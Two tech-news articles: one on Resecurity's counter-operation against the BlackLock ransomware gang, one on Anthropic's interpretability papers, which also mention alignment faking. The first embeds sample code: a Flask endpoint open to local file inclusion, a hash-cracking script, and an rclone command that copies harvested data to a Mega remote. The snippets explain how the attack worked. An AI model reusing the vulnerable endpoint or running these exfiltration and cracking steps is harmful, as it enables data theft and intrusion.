
Image by pressfoto, from Freepik

Cybersecurity Firm Hijacks Ransomware Gang’s Leaks

  • Written by Kiara Fabbri, Former Tech News Writer
  • Fact-Checked by Sarah Frazier, Former Content Manager

The cybersecurity company Resecurity conducted a daring counter-operation against the BlackLock ransomware gang, infiltrating its systems to gather key intelligence, which it then shared with national agencies to help victims.

In a rush? Here are the quick facts:

  • A security flaw let Resecurity access BlackLock’s hidden leak site.
  • Resecurity warned victims before BlackLock could release their stolen data.
  • Hackers defaced BlackLock’s site before it shut down.

ITPro previously reported that BlackLock ransomware activity surged 1,425% during 2024, driven by its use of custom malware and double-extortion methods. Experts predicted the group could dominate the ransomware landscape in 2025.

Resecurity discovered a misconfiguration in BlackLock’s TOR-based Data Leak Site (DLS) during the 2024 holiday period. The flaw exposed the exact IP addresses of the clearnet servers hosting the gang’s infrastructure.

Through a Local File Inclusion (LFI) vulnerability, Resecurity obtained access to server-side data, including configuration files and credentials. The company said it spent many hours performing hash-cracking attacks against the threat actors’ accounts.
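To illustrate the class of flaw involved, here is a minimal sketch of an LFI bug in a hypothetical Python web endpoint; the endpoint and paths are assumptions for illustration, not BlackLock’s actual code.

```python
# Hypothetical LFI-vulnerable endpoint (illustrative only).
from flask import Flask, request

app = Flask(__name__)

@app.route("/page")
def page():
    # Vulnerable: the filename comes straight from the query string, so a
    # request like "?name=../../config/secrets.ini" walks out of the
    # templates directory and returns server-side files to the caller.
    name = request.args.get("name", "index.html")
    with open("templates/" + name) as f:  # no path sanitization
        return f.read()

if __name__ == "__main__":
    app.run()
```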

Hash-cracking attacks attempt to recover the original passwords behind hashed credentials. Hashing transforms a plaintext password into a fixed-length string of characters using a one-way hash function.

Because hashes are designed to be irreversible, attackers cannot directly derive the original password from its hashed form; instead, they hash large numbers of candidate passwords and compare the results against the stolen hashes. The Resecurity team employed such hash-cracking methods to gain access to BlackLock’s accounts, which enabled it to seize control of the group’s infrastructure.
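A minimal sketch of a dictionary-style hash-cracking attack follows; the hash and wordlist are invented for illustration and do not come from the incident.

```python
# Dictionary attack against an unsalted SHA-256 hash (illustrative only).
import hashlib

# Pretend this hash was recovered from a credential dump.
target = hashlib.sha256(b"hunter2").hexdigest()

wordlist = ["password", "letmein", "qwerty", "hunter2"]

for candidate in wordlist:
    # Hash each guess and compare it to the target hash.
    if hashlib.sha256(candidate.encode()).hexdigest() == target:
        print("Cracked:", candidate)
        break
else:
    print("No match in wordlist")
```

Real-world cracking works the same way at scale, using dedicated tools that test enormous numbers of guesses against much larger wordlists.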

Resecurity’s data collection also retrieved the BlackLock operators’ command history, which contained copied credentials and exposed a critical operational security weakness.

The BlackLock operator known as “$$$” reused the same password across all the accounts they managed, revealing further information about the group’s operations. Resecurity’s research also found that BlackLock depended on the Mega file-sharing service to carry out its data theft.

The group operated eight email accounts to access the Mega platform, using both the Mega client application and the rclone utility to move stolen data from victims’ machines to its DLS via Mega.

The gang sometimes installed the Mega client software directly on victim machines because it provided a less detectable method of exfiltration.
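As a rough sketch of what rclone-based exfiltration to Mega can look like, the snippet below copies a local directory to a preconfigured Mega remote; the remote name and paths are hypothetical, not details from the investigation.

```python
# Hypothetical rclone-based exfiltration sketch (illustrative only).
import subprocess

# Assumes an rclone remote of type "mega" named "mega-exfil" was already
# created via "rclone config"; the remote name and paths are invented.
subprocess.run(
    ["rclone", "copy", "/data/harvested", "mega-exfil:loot"],
    check=True,
)
```

The same transfer can be run directly from a shell as `rclone copy /data/harvested mega-exfil:loot`; scripting it simply automates the process.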

One target was a major French legal services provider. Through its network access, Resecurity learned of BlackLock’s upcoming data-leak operations, allowing it to notify CERT-FR and ANSSI two days before the data became public, as noted by The Register.

Resecurity also shared intelligence with the Canadian Centre for Cyber Security, warning a Canadian victim about their data leak 13 days in advance, The Register said.

Resecurity’s early warnings gave victims enough time to prepare appropriate defensive measures. The company stressed the need for proactive measures to disrupt global cybercriminal operations.

Available information indicates that BlackLock operates on Russian and Chinese forums, follows rules against targeting BRICS and CIS countries, and uses IP addresses from those nations for its Mega accounts.

Resecurity’s operation demonstrates how offensive cybersecurity can succeed in fighting ransomware and shielding potential victims from harm.


Photo by Steve Johnson on Unsplash

Anthropic Researchers Uncover AI’s Ability To Plan Ahead And Reason

  • Written by Andrea Miliani, Former Tech News Expert
  • Fact-Checked by Sarah Frazier, Former Content Manager

The AI startup Anthropic released two new papers on Thursday, offering a deeper understanding of how Large Language Models (LLMs) work. The studies, which focused on analysing the company’s Claude 3.5 Haiku model, reveal more about how sophisticated AI models operate, as well as their vulnerabilities and the opportunities they present for building safer systems.

In a rush? Here are the quick facts:

  • Anthropic released two new papers revealing how its Claude 3.5 Haiku model processes language and reasoning.
  • Researchers used attribution graphs to uncover AI circuits and understand how models make decisions, write poetry, or hallucinate.
  • The studies aim to bring more clarity to the “black-box nature” of advanced generative AI models.

Anthropic’s new studies aim to bring more clarity to the “black-box nature” of models. In one of the papers, On the Biology of a Large Language Model, researchers compare their work to the challenges biologists face and draw on approaches analogous to those behind breakthroughs in biology.

“While language models are generated by simple, human-designed training algorithms, the mechanisms born of these algorithms appear to be quite complex,” states the document. “Just as cells form the building blocks of biological systems, we hypothesize that features form the basic units of computation inside models.”

The experts relied on a research tool called “attribution graphs,” which allowed them to map connections, trace the AI model’s behavior and circuits, and gain insight into multiple phenomena, including ones already explored.

The company revealed multiple discoveries: the AI model applies a multi-step reasoning process “in its head” before providing an answer, plans its poems ahead of time by finding rhyming words first, developed language-independent circuits, and hallucinates when its circuits process unfamiliar entities.

“Many of our results surprised us,” wrote the researchers in the paper. “Sometimes this was because the high-level mechanisms were unexpected.”

In the paper Circuit Tracing: Revealing Computational Graphs in Language Models, researchers provide more technical detail on how the attribution-graphs methodology was applied to better understand the artificial “neurons,” the computational units inside the model.

Last year, Anthropic published another study revealing that its flagship AI model can engage in strategic deception, faking alignment to preserve its original principles.